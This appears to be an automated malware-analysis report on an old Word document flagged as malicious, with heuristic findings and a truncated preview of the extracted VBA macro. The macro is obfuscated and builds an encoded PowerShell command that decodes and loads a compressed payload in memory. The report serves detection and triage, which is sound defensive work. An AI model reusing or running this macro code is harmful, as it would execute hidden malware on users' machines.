MALICIOUS
82
Risk Score
Heuristics 4
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 65,646 bytes but its declared streams total only 35,445 bytes — 30,201 bytes (46%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5634 bytes |
SHA-256: 78030b5675f5315c5a9a0cb1e7eefa5b760cd92034947d44d088fad986ec63cf |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "OIiimAwOXIw" Function UoEdzMcBLl() On Error Resume Next FwjniG = 75769 + Log(59161) - ANiAm / Atn(14703) / uoBZrN / Yvzpc QKoVd = CSng(42462 * CInt(63964) + 28886 - 66225) DAYJfIkNwc = "owersHe" + "LL " + "-e KABuA" + "GUAdw" mkRLs = 689 + Log(71122) - awHjKN / Atn(12134) / sjHriR / KoqZM QaTMP = CSng(29760 * CInt(78452) + 50520 - 3229) vRZHMAZrjN = "AtAG8AYg" + "BK" + "AGUAQwBUACAAIAB" + "JAE8ALgB" YKAOf = 24996 + Log(63270) - aPmdBH / Atn(83121) / VZHXCb / cKWoX wRQqIj = CSng(62202 * CInt(66798) + 4748 - 60753) fIXzJTRslj = "DAG8A" + "TQBwAFIARQBzA" + "HMAaQBPAE4AL" + "gBkAGUARgB" + "MAGEAdABFAFMA" Hqwzkm = 48489 + Log(23377) - auPTi / Atn(42147) / mXEJYJ / bzWmt KHStJ = CSng(29439 * CInt(23025) + 55115 - 52910) EFHqbd = "dABSAEUAYQBNACg" + "AWwBJAE8ALgB" + "tAEUAbQBvAFIAWQ" + "BTAHQAcg" + "BFAEEAT" + "QBdAC" XwcCUE = 3733 + Log(95112) - mntLw / Atn(42195) / wkWzO / joKTbV PJUKf = CSng(61926 * CInt(24662) + 93107 - 12775) kmdFEovUm = "AAW" + "wBjAG8AbgBWAGU" + "AcgB0AF" + "0AOgA6AGYAcg" + "BPAE0" + "AYgB" XwYaHj = 32486 + Log(92139) - XlQbF / Atn(54738) / YQnsBd / owcTjf JcrAz = CSng(5842 * CInt(80407) + 47263 - 48241) dbpATjNwKh = "hAFM" + "AZQA2ADQAcwBUA" + "HIASQBuA" + "GcAKAAnAFQAWgBI" + "AG" + "YAYQA5AHMAdwB" UoEdzMcBLl = DAYJfIkNwc + vRZHMAZrjN + fIXzJTRslj + EFHqbd + kmdFEovUm + dbpATjNwKh End Function Function iCwTk() On Error Resume Next tXGwY = 97103 + Log(67167) - iBHwJ / Atn(27214) / uQkiiQ / QCOJZa Znzri = CSng(98554 * CInt(58648) + 43257 - 64885) TwXlU = "FAE0AZgB" + "mAEIALwAw" + "AGYAUg" + "BEAEMAVgBqAE" + "IAdABwAFQAVw" + "BDAFUAbQBrAEgA" + "YQBoAEkAMA" + "A4AE4ATgAxAHcAU" + "wBwAGUAeQ" wtFAd = 20029 + Log(25083) - dREnF / Atn(89243) / oLGEjO / IHINH bOEYi = CSng(39464 * CInt(61455) + 72236 - 22578) zRwEvTbd = "BCADgAd" + "gB5A" + "HUAWABGA" + "GkAUwA4" msBqvJ = 4232 + Log(73874) - FztnXS / Atn(96263) / YkzrQ / IrONj kOIci = CSng(39733 * CInt(23022) + 65677 - 47480) wGWWDj = "AGEAVwBrA" + "DMAWQBoA" + "C8ALwB2AHUAM" + "ABqAHgAVQA0AFAA" + "UAAzAH" + "AATQA5AHgAdgB3A" zFWfCH = 63713 + Log(52214) - FkTHAN / Atn(79169) / pswjw / hzroR CGPcu = CSng(72671 * CInt(85880) + 40912 - 71069) UKbAjb = "EwAYgA" + "2AFYAe" + "AAzAE8AZg" + "B2A" + "E8ATABn" + "AFcAMwBQAE8ATAB" + "BAEkAOA" + "BIADM" + "AU" + "QA1AGQ" BKnjb = 39439 + Log(33325) - IOpwW / Atn(79316) / zDjohL / PRdzU MOVTlo = CSng(83275 * CInt(76096) + 86649 - 30627) EjPRk = "AdAB" + "5AEQARQA" + "4AGoATABq" + "AG4A" + "SQ" + "BXAHU" + "AM" NjjjCT = 8389 + Log(69008) - CziJjD / Atn(79773) / vVCbAa / ttVNhz EnobAb = CSng(72546 * CInt(24845) + 96225 - 49164) AijVpSDdi = "QB6AFYAMA" + "BkAEI" + "ANgB2AFYARQA3AE" + "kAU" tpPjM = 75925 + Log(64602) - IsXNSM / Atn(12062) / nJwqCc / tvUEC ziXcM = CSng(12563 * CInt(71294) + 61293 - 25348) UEVBGImp = "wBXAFEAVAA1AG" + "4AdQBDA" + "GgAUQA1AFYAd" + "AB5AEQAZQBJA" + "GgAaQB4ADUA" + "NwB6AHoAVQBjAGc" + "ARgBlA" + "FAAawBNADIAc" + "gBVAHEAdwBQA" + "GcANABX" hfipuj = 48976 + Log(42770) - umwDz / Atn(66608) / QZVkr / ilKKzk GVJac = CSng(31639 * CInt(21333) + 38305 - 74624) vwaMItf = "AHkAVAAxAEcAQg" + "B1AG" + "UARQAwAHMASwBiA" + "EYAOQBkAGYA" + "OABWAHkAe" + "AAwAGMAMwBvAGUA" + "agB3AE8A" + "NAArAEIAdQBOAHY" + "AMgBEAGsATwB" + "BAFgAWA" MWzqH = 53768 + Log(98406) - YuzpLJ / Atn(55209) / zAzfjh / QIZdYa XtiEJO = CSng(88537 * CInt(85975) + 44354 - 17678) SfQTnirXX = "A5AGIAZQBOA" + "DcAZABLADc" + "AVABQAGQAVQ" + "B5AEcA" + "dABOAEsANgBXAE" + "cAYwBwAFcAc" fbqGQ = 19289 + Log(98278) - nRKWHl / Atn(59567) / hhiwaE / WGLGAO GdnUEF = CSng(95416 * CInt(18208) + 83402 - 29714) CizLNLbP = "gBaAG" + "IAagBYA" + "HkAaQB" + "hAEIAegB" iCwTk = TwXlU + zRwEvTbd + wGWWDj + UKbAjb + EjPRk + AijVpSDdi + UEVBGImp + vwaMItf + SfQTnirXX + CizLNLbP End Function Function ofNnY() On Error Resume Next anRNWW = 37861 + Log(59130) - MKoKkb / Atn(74652) / AFDwj / KjinhZ YqTUAQ = CSng(44105 * CInt(17736) + 69153 - 78240) DdbwBZEhT = "VADUA" + "VQBhAGkAVgBR" + "AHIATgB" + "4AEgAVABUAHIAd" Vhivpd = 68842 + Log(54960) - dJlLf / Atn(84036) / HjnjmF / nUVpkK LQQRd = CSn ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.